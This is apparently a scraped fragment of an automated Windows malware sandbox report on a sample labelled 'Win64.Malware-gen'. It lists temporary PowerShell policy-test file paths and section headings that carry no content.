C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ar5cncj.aol.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_agnoeq0v.q4h.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aio0ubsg.ixi.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gfpavd4s.aei.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hlvipkkl.bcf.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kmcuaaj5.oof.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lnmsewhx.qgh.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mx4dkhw4.z0q.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pp4ibco5.rsx.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmlrqvwh.mlt.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rfakr5b5.h23.psm1

\Device\Null

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe